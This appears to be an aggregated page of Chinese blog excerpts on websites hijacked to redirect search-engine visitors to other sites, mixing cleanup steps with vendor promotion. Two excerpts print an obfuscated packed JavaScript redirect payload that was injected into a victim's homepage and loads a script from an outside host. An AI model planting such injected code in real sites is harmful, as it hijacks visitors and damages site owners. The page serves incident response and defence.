精华内容
下载资源
问答
  • 为了不让SEOer发现网站被挂马,使得用户输入网址时可以正常访问网站,当用户通过搜索引擎(如百度)搜索打开网站时,则跳转到其他网站。这样即实现了“引流”,又做比较隐蔽。原理很简单,通过程

    最近很多百度优化的朋友问:
    “为什么百度等搜索引擎打开自己的网站却跳转到其他网站?”,这种情况是被劫持了
    下面分享解决为什么百度等搜索引擎打开自己的网站却跳转到其他网站的方法。
    打开自己的网站却跳转到其他网站的解决方法
    一、百度等搜索引擎打开自己的网站却跳转到其他网站原理
    黑客给网站挂马主要的目的是为了,增加其他网站流量。为了不让SEOer发现网站被挂马,使得用户输入网址时可以正常访问网站,当用户通过搜索引擎(如百度)搜索打开网站时,则跳转到其他网站。这样即实现了“引流”,又做的比较隐蔽。原理很简单,通过程序或者JS,判断访问网站来路,如果是搜索引擎,则跳转到指定的其他网址;如果不是搜索引擎,则不做跳转(网站正常打开)。对于缺乏专业维护人员的网站,建议向 360网站管家 咨询
    IIS7网站监控工具可以做到提前预防各类网站劫持、并且是免费在线查询、适用于各大站长、政府网站、学校、公司、医院等网站。他可以做到24小时定时监控、同时它可以让你知道网站是否被黑、被入侵、被改标题、被挂黑链、被劫持、被墙及DNS是否被污染等等功能、更是拥有独家检测网站真实的完全打开时间、让你作为站长能清楚的知道自己网站的健康情况!
    官方地址:IIS7服务器管理工具
    官方图在这里插入图片描述
    在这里插入图片描述

    二、百度等搜索引擎打开自己的网站却跳转到其他网站的解决方法
    解决方法说是很简单,清理掉木马文件即可解决,实际操作起来比较难。因为,黑客为了安全起见会将木马加密,因此很难发现木马文件的位置。木马文件一般分为两种形式出现,其一、隐藏在程序脚本里,使用301重定向;其二、则是隐藏在JS文件里,使用修改当前页面URL。
    1、快速寻找木马文件的方法
    登陆网站的FTP,看文件的修改日期,如果有最近修改的文件,那么一般木马就在这些文件里,仔细检查这些文件即可快速找到木马文件。
    2、普通寻找木马文件的方法
    如果百度搜索网站网址打开网站首页却跳转到其他网站,而在浏览器上输入网址却网站首页能正常打开。那么说明,网站首页被挂了木马。
    浏览器输入网址打开网站首页,鼠标右击查看源文件,看源码里面是否有可疑的JS代码。如果有则删除,看从百度上访问网站是否正常了,如果正常了说明该代码就是木马文件;如果没有可疑JS代码或者删除可疑JS代码从百度打开网站依然有跳转,那么则,检查首页上调用的所有JS文件,特别是网站通用的JS文件,检测里面是否有可疑JS代码,有则删除,检测从百度打开网站是否还有跳转。
    如果检测所有JS文件没有发现木马文件,则说明木马文件在程序脚本里面。检测首页程序文件(如index.php)以及和该文件有关联的文件,看是否有可疑的代码,有则删除,检测从百度打开网站是否还有跳转。
    就这样找可疑代码,发现就删除,测试从百度打开网站是否还有跳转,又不了多久就能将木马文件揪出来。
    注意:在删除可疑文件的时候,记得做备份,防止误删,更重要的是记下该文件的修改日期。
    3、寻找黑客留下的后门
    删除木马文件,网站可能正常使用了,并非万事大吉了。黑客攻下你的网站后,为了方便“管理”你的网站,会留下N多后门木马。所以,我们必须清除掉这些后门木马,才算万事大吉。
    找到木马文件,后门木马文件就很容易找了。可以通过修改日期寻找,如果木马文件的修改日期是“2017-09-12 08:55”,那么后门文件的修改日期也会是“2017-09-12”。我们只要找修改日期是“2017-09-12”的文件即可,发现可疑就删除掉。
    三、黑客靠什么将木马文件放到网站上的,怎么处理
    具体方法不清楚,一般是由于网站程序有漏洞、空间不安全或者同空间的其他网站有漏洞从而找到了你的网站。
    如果网站经常被挂木马,建议先更换空间;如果换了空间还会被挂木马,建议换个安全性高的网站程序。

    展开全文
  • 2、知道它的打开是否会显示情况后,分段查看网页代码,一般都是串改你js文件,所以从js库开始一个个查 3、每个查完后都再次清理cookie,知道不会再返回跳转位置 今天公司网站遇到这种情况,做个记录! ...

    1、第二次打开不会跳转时因为手机保存了cookie,一般情况下打开手机设置-》清除记录-》清除cookie后再打开会出现相同情况

    2、知道它的打开是否会显示情况后,分段查看网页代码,一般都是串改你的js文件,所以从js库开始一个个查

    3、每个查完后都再次清理cookie,直到不会再返回跳转位置

    今天公司网站遇到这种情况,做个记录!

    展开全文
  • 这几天我们Sine安全接到一个单位服务器里三个网站都被劫持跳转问题客户反映在百度搜索关键词后点击进入网站直接被跳转到菠菜网站,直接在浏览器里输入网址是正常打开的,由于客户单位网站的领导比较重视这个被恶意...

    这几天我们Sine安全接到一个单位服务器里的三个网站都被劫持跳转问题的客户反映在百度搜索关键词后点击进入网站直接被跳转到菠菜网站,直接在浏览器里输入网址是正常打开的,由于客户单位网站的领导比较重视这个被恶意劫持跳转的问题特别要求加班要抓紧处理解决掉这个网站安全问题,因为实在是对该单位网站的信誉以及客户的信任度损害的比较大.

    网站被劫持跳转的问题分析

    随即我们和该单位网站负责人进行了服务器信息以及网站信息的交接,由我们Sinesafe安全部门的技术主管团队进行了全面的网站安全检测以及漏洞检测以及木马后门和恶意跳转代码的审计工作,发现客户的3个网站都是用的主流网站开源程序php+mysql架构,由于客户之前老是被劫持跳转,删除恶意代码后没过多久就又被篡改了,反复性质的被篡改客户经常为此问题烦恼。首先得让网站正常访问不让网站从百度搜索直接跳转,那么这个跳转代码一般都会加在首页文件最顶部。打开首页文件查看下源代码就会看到加密的代码也就是跳转的代码如图:

    type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

    上述代码就是一个js判断来路跳转的代码。跳转到的网站截图如下:

    客户单位另一个网站用的是dz论坛程序也是被跳转了,代码被修改加在了config目录下的config_global.php文件里

    客户的第三个网站用的是dedecms系统,首页也是被增加了和上述第一张图的代码,随即我们先对这3个站点的恶意跳转代码进行了清除,使网站正常访问,到这里并不是解决掉了问题哦! 这只是单纯的删除恶意跳转的代码,因为根源问题是在程序有漏洞导致被黑客入侵上传了webshell俗称网站木马后门.因为之前客户就说过是反复性质的被篡改!清理掉后没过多久就又被篡改了。所以要对程序漏洞进行详细的漏洞修补和代码的安全审计以及后门木马的清理和服务器安全的防护设置,才能确保网站日后的正常运行。

    对症下药找出问题根源进行网站漏洞修补

    针对这三个网站的程序代码进行了全面的人工安全代码审计以及漏洞检测修补和后门木马的清理,发现dedecms和dz论坛的程序存在getshell和sql注入获取管理员账户和密码,以及上传绕过漏洞。另外一个站是因为服务器的目录安全权限没做好,导致可以跨目录写入才会导致这个站也被篡改了,所以说如果服务器安全没做好,网站安全即使做的再牛逼也毫无用处,我们Sinesafe能做的就是让客户少走弯路,省心省力保障客户网站的安全运行。

    下面几个图片就是被上传的网站后门木马代码:

    下面介绍几个日常用到的防范网站被黑被入侵篡改的建议

    1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

    2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

    3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

    4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

    专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
    展开全文
  • 这几天我们Sine安全接到一个单位服务器里三个网站都被劫持跳转问题客户反映在百度搜索关键词后点击进入网站直接被跳转到菠菜网站,直接在浏览器里输入网址是正常打开的,由于客户单位网站的领导比较重视这个被恶意...

    这几天我们Sine安全接到一个单位服务器里的三个网站都被劫持跳转问题的客户反映在百度搜索关键词后点击进入网站直接被跳转到菠菜网站,直接在浏览器里输入网址是正常打开的,由于客户单位网站的领导比较重视这个被恶意劫持跳转的问题特别要求加班要抓紧处理解决掉这个网站安全问题,因为实在是对该单位网站的信誉以及客户的信任度损害的比较大.

    网站被劫持跳转的问题分析

    随即我们和该单位网站负责人进行了服务器信息以及网站信息的交接,由我们Sinesafe安全部门的技术主管团队进行了全面的网站安全检测以及漏洞检测以及木马后门和恶意跳转代码的审计工作,发现客户的3个网站都是用的主流网站开源程序php+mysql架构,由于客户之前老是被劫持跳转,删除恶意代码后没过多久就又被篡改了,反复性质的被篡改客户经常为此问题烦恼。首先得让网站正常访问不让网站从百度搜索直接跳转,那么这个跳转代码一般都会加在首页文件最顶部。打开首页文件查看下源代码就会看到加密的代码也就是跳转的代码如图:

    type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

    上述代码就是一个js判断来路跳转的代码。跳转到的网站截图如下:

    客户单位另一个网站用的是dz论坛程序也是被跳转了,代码被修改加在了config目录下的config_global.php文件里

    客户的第三个网站用的是dedecms系统,首页也是被增加了和上述第一张图的代码,随即我们先对这3个站点的恶意跳转代码进行了清除,使网站正常访问,到这里并不是解决掉了问题哦! 这只是单纯的删除恶意跳转的代码,因为根源问题是在程序有漏洞导致被黑客入侵上传了webshell俗称网站木马后门.因为之前客户就说过是反复性质的被篡改!清理掉后没过多久就又被篡改了。所以要对程序漏洞进行详细的漏洞修补和代码的安全审计以及后门木马的清理和服务器安全的防护设置,才能确保网站日后的正常运行。

    对症下药找出问题根源进行网站漏洞修补

    针对这三个网站的程序代码进行了全面的人工安全代码审计以及漏洞检测修补和后门木马的清理,发现dedecms和dz论坛的程序存在getshell和sql注入获取管理员账户和密码,以及上传绕过漏洞。另外一个站是因为服务器的目录安全权限没做好,导致可以跨目录写入才会导致这个站也被篡改了,所以说如果服务器安全没做好,网站安全即使做的再牛逼也毫无用处,我们Sinesafe能做的就是让客户少走弯路,省心省力保障客户网站的安全运行。

    下面几个图片就是被上传的网站后门木马代码:

    下面介绍几个日常用到的防范网站被黑被入侵篡改的建议

    1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

    2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

    3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

    4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

    展开全文
  • 网站辛辛苦苦的seo优化成果出来了,可点击百度排名结果居然跳转别的网站!!作为一个seo,恐怕这种事情是最让人上火的情况之一了。最进不少排名较 好的网站出现了这么一个现象,从百度里搜索我的网站排名的关键词...
  • 重装系统之后,打开浏览器会先跳转到一个无意义的网站【s.ss889988.com】,然后再转到目标网页,找了很久,发现在浏览器设置中的管理引擎,选的有问题,换成一个正常的就ok了,我截图是好了之后的,当时忘记截图。...
  • (一定请仔细看)前几天在群里面有朋友推给我一个HS链接,我就打开看了,这个链接有个特别地方,他需要我收藏起来,才能看到他本身页面,如果你不收藏话,呵呵,直接给你传送到aiqiyi,而且电脑上我也看了也...
  • 网站是PHP源码,双端,在PC浏览器管理后台不会跳转 测试安卓,iPhone都会有恶意跳转百度、淘宝、jd、西瓜 火山 抖音这些APP,而且是一次所有跳转打开了 多次测试发现特别是启动后第一下点击,点击位置也...
  • 为什么明明输入的网址是A,但是打开的网站是B?为什么别的站点随便什么网址打开都是同一个页面?为什么别人换了网址也不需要单独说明?让我们走进边缘规则的妙用解开谜底。 经常会有朋友来问,网站访问时会自动从 ...
  • 得到搜索结果后可以跳转别的网站,比如Google图片。怀疑百度网页搜索有什么代码,特别诡异,希望大大查看下。</p><p>该提问来源于开源项目:qxinGitHub/searchEngineJump</p></div>
  • 很多公司的网站被攻击,导致网站打开跳转别的网站上去,网站快照也被篡改,收录一些非法的内容快照,有些网站数据库都被篡改,修改了会员资料,数据库被删除,等等攻击症状,我们SINE安全在解决客户网站被攻击的...
  • 用户体验优化在如今的网站中已是非常重要。没有好的、优秀的网站体验,这个网站很难成功,足以见用户对网站的用户体验...一般情况下,当前为首页、列表页切换页面,一般另窗口打开,最终页一般当前页面直接跳转。 ...
  • 很多公司的网站被攻击,导致网站打开跳转别的网站上去,网站快照也被篡改,收录一些非法的内容快照,有些网站数据库都被篡改,修改了会员资料,数据库被删除,等等攻击症状,我们SINE安全在解决客户网站被攻击的...
  • 很多企业网站被攻击,导致网站打开跳转别的网站,尤其一些等非法网站上去,甚至有些网站被攻击的打不开,客户无法访问首页,给客户造成了很大的经济损失,很多客户找到我们SINE安全公司寻求防止网站被攻击的解决...
  • 很多公司的网站被攻击,导致网站打开跳转别的网站上去,网站快照也被篡改,收录一些非法的内容快照,有些网站数据库都被篡改,修改了会员资料,数据库被删除,等等攻击症状,我们SINE安全在解决客户网站被攻击的...
  • 很多企业网站被攻击,导致网站打开跳转别的网站,尤其一些彩票等非法网站上去,甚至有些网站被攻击的打不开,客户无法访问首页,给客户造成了很大的经济损失,很多客户找到我们SINE安全公司寻求防止网站被攻击的...
  • 很多公司的网站被攻击,导致网站打开跳转别的网站上去,网站快照也被篡改,收录一些非法的内容快照,有些网站数据库都被篡改,修改了会员资料,数据库被删除,等等攻击症状,我们SINE安全在解决客户网站被攻击的...
  • 我们知道,在常规HTML页面里头,点一般链接,会实现页面的跳转,并且地址栏也跟着变化,用户想将某个页面加入收藏夹,下次打开就直接显示那个页面,而非首页。 然而,FLASH站,特别是只有一个HTML页面那种站...
  • 近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开跳转别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们...
  • 网站被恶意攻击,也是时常有事情,特别是一些个人...首先,我们要了解网站被攻击会有哪些表现 一般会有DDOS、CC攻击,甚至有快照劫持等,会造成网站无法打开,或者打开之后跳转到未知网站上,对站长来说网站排名好不
  • 本程序是在淘宝开放平台基础之上制作而成,程序采用了淘宝最先进api技术.本程序经过实际应用测试,长时间运行,确保程序稳定高效. ...api接口修改请打开Config.Asp文件按说明修改. 程序演示 http://093571.cn/zztb/
  • 近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开跳转别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们...
  • 近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开跳转别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们...
  • 2019年2月12日,根据客户的反应,说点击网站上的链接都会跳转别的第三方的网站。然后就开始排查,登录上服务器,把项目的所有文件拷贝下来。 打开入口文件,里面的代码原来是被替换成静态的前端代码~我晕~ ...
  • 近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开跳转别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们...
  • 近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开跳转别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们...
  • 最近,非个人主体认证小程序,可以直接在html页面中打开,这个权限还挺有用,不仅适用于微信内部浏览器,而且还可以在外部浏览器或者app中打开,比如UC浏览器、华为浏览器等。这里注意一下,官方特别说明:...

空空如也

空空如也

1 2 3 4 5 6
收藏数 109
精华内容 43
关键字:

打开网站跳转别的网站